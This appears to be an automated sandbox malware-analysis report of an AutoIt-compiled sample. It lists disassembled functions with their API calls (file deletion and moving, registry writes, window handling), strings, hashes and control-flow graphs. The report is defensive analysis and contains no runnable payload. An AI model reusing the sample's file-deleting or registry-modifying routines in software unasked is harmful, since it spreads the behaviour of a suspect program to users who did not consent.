                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                    • String ID: 0$>$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                    • API String ID: 683915450-1561685704
                                                    • Opcode ID: 49c0105af6170062accdeebd135aa3687d8f4c3aa16f7ea1a629cfb8a34b9a7f
                                                    • Instruction ID: 60c8674ac3706a49e4f9d9c937fe86778a5a2f88fc5a9b9916c1177ed4af17bd
                                                    • Opcode Fuzzy Hash: 49c0105af6170062accdeebd135aa3687d8f4c3aa16f7ea1a629cfb8a34b9a7f
                                                    • Instruction Fuzzy Hash: CC51F735108385AAC71BEF62DC56DEF7BAD9F89740F400529F4915A1E2CF608A89CB23
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037D836 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2549 37d836-37d894 call 31bf07 * 3 call 31557e * 2 call 37e958 call 37e9c5 2564 37d896-37d89a call 3165a4 2549->2564 2565 37d89f-37d8a9 call 37e9c5 2549->2565 2564->2565 2569 37d8b4-37d8f2 call 31bf07 * 2 call 31694e FindFirstFileW 2565->2569 2570 37d8ab-37d8af call 3165a4 2565->2570 2578 37da23-37da2a FindClose 2569->2578 2579 37d8f8 2569->2579 2570->2569 2581 37da2d-37da5b call 31bd2c * 5 2578->2581 2580 37d8fe-37d900 2579->2580 2580->2578 2582 37d906-37d90d 2580->2582 2584 37d913-37d979 call 31b25f call 37df85 call 31bd2c call 317af4 call 3165a4 call 37dc8e 2582->2584 2585 37d9ef-37da02 FindNextFileW 2582->2585 2608 37d99f-37d9a3 2584->2608 2609 37d97b-37d97e 2584->2609 2585->2580 2588 37da08-37da0d 2585->2588 2588->2580 2612 37d9a5-37d9a8 2608->2612 2613 37d9d1-37d9d7 call 37da5c 2608->2613 2610 37d984-37d99b call 32e2e5 2609->2610 2611 37da12-37da21 FindClose call 31bd2c 2609->2611 2622 37d9ad-37d9b6 MoveFileW 2610->2622 2625 37d99d DeleteFileW 2610->2625 2611->2581 2616 37d9aa 2612->2616 2617 37d9b8-37d9c8 call 37da5c 2612->2617 2619 37d9dc 2613->2619 2616->2622 2617->2611 2628 37d9ca-37d9cf DeleteFileW 2617->2628 2624 37d9df-37d9e1 2619->2624 2622->2624 2624->2611 2627 37d9e3-37d9eb call 31bd2c 2624->2627 2625->2608 2627->2585 2628->2624
                                                    APIs
                                                      • Part of subcall function 0031557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00315558,?,?,00354B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0031559E
                                                      • Part of subcall function 0037E9C5: GetFileAttributesW.KERNELBASE(?,0037D755), ref: 0037E9C6
                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 0037D8E2
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0037D99D
                                                    • MoveFileW.KERNEL32(?,?), ref: 0037D9B0
                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 0037D9CD
                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0037D9F7
                                                      • Part of subcall function 0037DA5C: CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,0037D9DC,?,?), ref: 0037DA72
                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 0037DA13
                                                    • FindClose.KERNEL32(00000000), ref: 0037DA24
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 1946585618-1173974218
                                                    • Opcode ID: f889174851e02c67ae1dafe6e69d5df8dd6e9dfae6dde2c3ed6c972d211c437e
                                                    • Instruction ID: 4a2e9bd584f25fb2a68446cef5da35ccfc72899769b826ccd52aea0f69d84757
                                                    • Opcode Fuzzy Hash: f889174851e02c67ae1dafe6e69d5df8dd6e9dfae6dde2c3ed6c972d211c437e
                                                    • Instruction Fuzzy Hash: 9161603180114DABCF1BEFE0D9429EDB7B9AF19300F2480A5E446BB191EB355F49CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037E387 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrlenW.KERNEL32(?,00354686), ref: 0037E397
                                                    • GetFileAttributesW.KERNELBASE(?), ref: 0037E3A6
                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 0037E3B7
                                                    • FindClose.KERNEL32(00000000), ref: 0037E3C3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                    • String ID:
                                                    • API String ID: 2695905019-0
                                                    • Opcode ID: 911173ed7232c1267a49749d289dd6a05964a2948fd8653d2f5ae20cd7bcb6e0
                                                    • Instruction ID: 1ff36260d504352d4c74028067fd3c7037e1a251b0675251058f8b813f35965c
                                                    • Opcode Fuzzy Hash: 911173ed7232c1267a49749d289dd6a05964a2948fd8653d2f5ae20cd7bcb6e0
                                                    • Instruction Fuzzy Hash: EEF0E53041192057D223677CAC0D8AA77AC9E46335F108B51F83BC34F0D7B4DDA58695
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00335078 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,0033504E,?,003D98D8,0000000C,003351A5,?,00000002,00000000), ref: 00335099
                                                    • TerminateProcess.KERNEL32(00000000,?,0033504E,?,003D98D8,0000000C,003351A5,?,00000002,00000000), ref: 003350A0
                                                    • ExitProcess.KERNEL32 ref: 003350B2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    • Opcode ID: ecde8d9173665cc14e7f93426cea3bf27c4490d55efb17a77e513ba47bf52d7c
                                                    • Instruction ID: c48b26cf9b925039f8484f86b836796323bb910273c027a6b491bc62ef8bfedb
                                                    • Opcode Fuzzy Hash: ecde8d9173665cc14e7f93426cea3bf27c4490d55efb17a77e513ba47bf52d7c
                                                    • Instruction Fuzzy Hash: 3FE0B631400548AFCF276F54DD49E593B6DEF41381F014014F8168B562DB36ED42CBD0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00330D65 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_00020D71,0033077E), ref: 00330D6A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 6c6035ba19b2386b266c701fd56dac657e8ea1f5dc79391ac0a94ba9256145a0
                                                    • Instruction ID: baa4192ff09386f845b5b5a6da992b58c52faf3c489eded5aa0a674f62061be3
                                                    • Opcode Fuzzy Hash: 6c6035ba19b2386b266c701fd56dac657e8ea1f5dc79391ac0a94ba9256145a0
                                                    • Instruction Fuzzy Hash:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0039CD16 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 39cd16-39cd5a call 31bf07 * 3 7 39cd5c-39cd5f 0->7 8 39cd65-39cdd8 call 318e70 call 39d6b1 call 39d2f7 0->8 7->8 9 39ce64-39ce71 call 31e650 7->9 21 39ce08-39ce0d 8->21 22 39cdda-39cde8 8->22 16 39d1ef-39d212 call 31bd2c * 3 9->16 27 39ce7c 21->27 28 39ce0f-39ce24 RegConnectRegistryW 21->28 24 39cdea 22->24 25 39cded-39cdfd 22->25 24->25 29 39cdff 25->29 30 39ce02-39ce06 25->30 31 39ce80-39ceab RegCreateKeyExW 27->31 33 39ce76-39ce7a 28->33 34 39ce26-39ce43 call 317ab0 28->34 29->30 36 39ce61-39ce63 30->36 37 39cead-39ceca call 317ab0 31->37 38 39cf0e-39cf13 31->38 33->31 44 39ce48-39ce58 34->44 45 39ce45 34->45 36->9 49 39cecc 37->49 50 39cecf-39cede 37->50 41 39cf19-39cf42 call 318e70 call 334db8 38->41 42 39d1d6-39d1e7 RegCloseKey 38->42 60 39cf44-39cf91 call 318e70 call 334cf3 call 318e70 * 2 41->60 61 39cf96-39cfb9 call 318e70 call 334db8 41->61 42->16 46 39d1e9-39d1ed RegCloseKey 42->46 51 39ce5a 44->51 52 39ce5d 44->52 45->44 46->16 49->50 54 39cee0 50->54 55 39cee3-39cef9 call 31e650 50->55 51->52 52->36 54->55 55->16 62 39ceff-39cf09 RegCloseKey 55->62 83 39d2bb-39d2c7 RegSetValueExW 60->83 72 39cfbf-39d019 call 318e70 call 334cf3 call 318e70 * 2 RegSetValueExW 61->72 73 39d047-39d06a call 318e70 call 334db8 61->73 62->16 72->42 103 39d01f-39d042 call 317ab0 call 31e650 72->103 88 39d070-39d0d6 call 318e70 call 33019b call 318e70 call 31605e 73->88 89 39d156-39d179 call 318e70 call 334db8 73->89 83->42 87 39d2cd-39d2f2 call 317ab0 call 31e650 83->87 87->42 124 39d0d8-39d0dd 88->124 125 39d0f6-39d128 call 318e70 RegSetValueExW 88->125 108 39d17f-39d19f call 31c92d call 318e70 89->108 109 39d215-39d238 call 318e70 call 334db8 89->109 103->42 126 39d1a1-39d1b4 RegSetValueExW 108->126 127 39d23a-39d260 call 31c5df call 318e70 109->127 128 39d265-39d282 call 318e70 call 334db8 109->128 129 39d0df-39d0e1 124->129 130 39d0e5-39d0e8 124->130 141 39d14a-39d151 call 3301a4 125->141 142 39d12a-39d143 call 317ab0 call 31e650 125->142 126->42 132 39d1b6-39d1c0 call 317ab0 126->132 127->126 144 39d1c5-39d1cf call 31e650 128->144 155 39d288-39d2b9 call 38276a call 318e70 call 3827da 128->155 129->130 130->124 134 39d0ea-39d0ec 130->134 132->144 134->125 139 39d0ee-39d0f2 134->139 139->125 141->42 142->141 144->42 155->83
                                                    APIs
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0039CE1C
                                                    • RegCreateKeyExW.KERNELBASE(?,?,00000000,003ADCD0,00000000,?,00000000,?,?), ref: 0039CEA3
                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0039CF03
                                                    • _wcslen.LIBCMT ref: 0039CF53
                                                    • _wcslen.LIBCMT ref: 0039CFCE
                                                    • RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 0039D011
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0039D120
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0039D1AC
                                                    • RegCloseKey.KERNELBASE(?), ref: 0039D1E0
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0039D1ED
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0039D2BF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 9721498-966354055
                                                    • Opcode ID: 2f37baab0b21dd406b93de82524845ff69c7f61a640801864a5c813cb696e31d
                                                    • Instruction ID: f0b59681534127f0278eaceeb45ff93cf56e3c772b0a6fcf1af80afc903d3c35
                                                    • Opcode Fuzzy Hash: 2f37baab0b21dd406b93de82524845ff69c7f61a640801864a5c813cb696e31d
                                                    • Instruction Fuzzy Hash: 4C1259356042019FDB1ADF14C881A6ABBE5FF88754F05849CF89A9F3A2CB31ED41CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00313E15 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 163 313e15-313e45 call 33019b call 33016b 168 313e47-313e49 163->168 169 313e6e-313e80 call 33919b 163->169 170 313e4a-313e50 168->170 169->170 175 313e82-313e94 call 33919b 169->175 173 313e52-313e62 call 33015d call 3301a4 170->173 174 313e65-313e6b 170->174 173->174 181 354585-354587 175->181 182 313e9a-313eac call 33919b 175->182 181->170 186 313eb2-313ec4 call 33919b 182->186 187 35458c-35458f 182->187 190 354594-3545cb call 314154 call 314093 call 313fb8 call 334cf3 186->190 191 313eca-313edc call 33919b 186->191 187->170 223 3545cd-3545d8 190->223 224 354608-35460b 190->224 197 313ee2-313ef4 call 33919b 191->197 198 35462e-354633 191->198 205 354677-354688 call 37a316 197->205 206 313efa-313f0c call 33919b 197->206 198->170 200 354639-354655 call 32e2e5 198->200 212 354657-35465b 200->212 213 354662-35466a 200->213 219 3546dc-3546e2 205->219 220 35468a-3546d2 call 31b25f * 2 call 315379 call 313aa3 call 31bd2c * 2 205->220 221 313f26 206->221 222 313f0e-313f20 call 33919b 206->222 212->200 217 35465d 212->217 213->170 218 354670 213->218 217->170 218->205 225 3546f5-3546ff call 37a12a 219->225 240 354704-354706 220->240 268 3546d4-3546d7 220->268 230 313f29-313f2e call 31ad74 221->230 222->170 222->221 223->224 231 3545da-3545e1 223->231 226 3545f6-354603 call 3301a4 224->226 227 35460d-35461b 224->227 225->240 226->225 239 354620-354629 call 3301a4 227->239 242 313f33-313f35 230->242 231->226 236 3545e3-3545e7 231->236 236->226 243 3545e9-3545f4 236->243 239->170 240->170 246 3546e4-3546e9 242->246 247 313f3b-313f5e call 313fb8 call 314093 call 33919b 242->247 243->239 246->170 248 3546ef-3546f0 246->248 263 313fb0-313fb3 247->263 264 313f60-313f72 call 33919b 247->264 248->225 263->230 264->263 270 313f74-313f86 call 33919b 264->270 268->170 273 313f88-313f9a call 33919b 270->273 274 313f9c-313fa5 270->274 273->230 273->274 274->170 276 313fab 274->276 276->230
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                    • API String ID: 0-1645009161
                                                    • Opcode ID: 041ad76c326981c2fc27566b561a89dffe0990cb0f476e2c8da8153eb157d390
                                                    • Instruction ID: 33747efd2297e53f252478950df2f7c12ef40c3a9343d8e860dc54da74641c7b
                                                    • Opcode Fuzzy Hash: 041ad76c326981c2fc27566b561a89dffe0990cb0f476e2c8da8153eb157d390
                                                    • Instruction Fuzzy Hash: 8A81D571A44206BBDB1BAF64DC42FEF7B68AF09700F044015FD06AE196EB70DA85C7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00330456 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00330456
                                                      • Part of subcall function 0033047D: InitializeCriticalSectionAndSpinCount.KERNEL32(003E170C,00000FA0,8377C484,?,?,?,?,00352753,000000FF), ref: 003304AC
                                                      • Part of subcall function 0033047D: GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00352753,000000FF), ref: 003304B7
                                                      • Part of subcall function 0033047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00352753,000000FF), ref: 003304C8
                                                      • Part of subcall function 0033047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 003304DE
                                                      • Part of subcall function 0033047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 003304EC
                                                      • Part of subcall function 0033047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 003304FA
                                                      • Part of subcall function 0033047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00330525
                                                      • Part of subcall function 0033047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00330530
                                                    • ___scrt_fastfail.LIBCMT ref: 00330477
                                                      • Part of subcall function 00330433: __onexit.LIBCMT ref: 00330439
                                                    Strings
                                                    • SleepConditionVariableCS, xrefs: 003304E4
                                                    • kernel32.dll, xrefs: 003304C3
                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 003304B2
                                                    • InitializeConditionVariable, xrefs: 003304D8
                                                    • WakeAllConditionVariable, xrefs: 003304F2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                    • API String ID: 66158676-1714406822
                                                    • Opcode ID: 63b5ed457679a638b6aed9e515ad6f60ed43a42108e6384efc9ee1f0b9a27c5a
                                                    • Instruction ID: 9b6b15c4d2f48cf8ef23cd414f0051b7f347e284e8b2d548cdfdcac13c6a31db
                                                    • Opcode Fuzzy Hash: 63b5ed457679a638b6aed9e515ad6f60ed43a42108e6384efc9ee1f0b9a27c5a
                                                    • Instruction Fuzzy Hash: 2C21DB32A447506FE72B6BB5AC95BAE77ECDB46F65F010129F902DBAD0DB709C008A50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0031EE0A Relevance: 21.6, APIs: 14, Instructions: 609windowsleeptimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                    • String ID:
                                                    • API String ID: 2189390790-0
                                                    • Opcode ID: 1ce1720a305b19ba4003ad6c1683820e64235fd773ad5dfd65e0bba25a928c46
                                                    • Instruction ID: e9446830c7f758a5de46791934d01392fb79659660aa74ab3071043bb14bce0f
                                                    • Opcode Fuzzy Hash: 1ce1720a305b19ba4003ad6c1683820e64235fd773ad5dfd65e0bba25a928c46
                                                    • Instruction Fuzzy Hash: 6A32E574604341EFD72BCF24C884BAAB7E9BF4A304F158A2DF4558B291D771E984CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00313696 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145windowtimeregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 673 313696-3136ab 674 31370b-31370d 673->674 675 3136ad-3136b0 673->675 674->675 678 31370f 674->678 676 313711 675->676 677 3136b2-3136b9 675->677 682 313717-31371c 676->682 683 353dce-353df6 call 312f24 call 32f1c6 676->683 679 31378b-313793 PostQuitMessage 677->679 680 3136bf-3136c4 677->680 681 3136f6-3136fe DefWindowProcW 678->681 688 31373f-313741 679->688 684 3136ca-3136ce 680->684 685 353e3b-353e4f call 37c80c 680->685 687 313704-31370a 681->687 689 313743-31376a SetTimer RegisterWindowMessageW 682->689 690 31371e-313721 682->690 718 353dfb-353e02 683->718 691 313795-31379f call 32fcbb 684->691 692 3136d4-3136d9 684->692 685->688 709 353e55 685->709 688->687 689->688 693 31376c-313777 CreatePopupMenu 689->693 696 313727-31373a KillTimer call 31388e call 31572c 690->696 697 353d6f-353d72 690->697 711 3137a4 691->711 698 353e20-353e27 692->698 699 3136df-3136e4 692->699 693->688 696->688 703 353d74-353d78 697->703 704 353daa-353dc9 MoveWindow 697->704 698->681 706 353e2d-353e36 call 371367 698->706 707 313779-313789 call 3137a6 699->707 708 3136ea-3136f0 699->708 712 353d99-353da5 SetFocus 703->712 713 353d7a-353d7d 703->713 704->688 706->681 707->688 708->681 708->718 709->681 711->688 712->688 713->708 719 353d83-353d94 call 312f24 713->719 718->681 722 353e08-353e1b call 31388e call 3138f2 718->722 719->688 722->681
                                                    APIs
                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00313690,?,?), ref: 003136FE
                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,00313690,?,?), ref: 0031372A
                                                    • SetTimer.USER32 ref: 0031374D
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00313690,?,?), ref: 00313758
                                                    • CreatePopupMenu.USER32(?,?,?,?,?,00313690,?,?), ref: 0031376C
                                                    • PostQuitMessage.USER32(00000000), ref: 0031378D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                    • String ID: 0$>$0$>$TaskbarCreated
                                                    • API String ID: 129472671-2151881006
                                                    • Opcode ID: 5ce969851600c65670d9a031cbdcaef6add6f735f3d56b55e38c4331b4260311
                                                    • Instruction ID: 368bfc18e29dc98fda2c9777db3db68c60f33efc1e9a8f99b161436260cb67d8
                                                    • Opcode Fuzzy Hash: 5ce969851600c65670d9a031cbdcaef6add6f735f3d56b55e38c4331b4260311
                                                    • Instruction Fuzzy Hash: 6941F5B5104184BBDB2F5B78DC8ABFA366DE70D350F001225F9468E6E1CBA59FC48652
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003135AB Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 003135DE
                                                    • RegisterClassExW.USER32 ref: 00313608
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00313619
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00313636
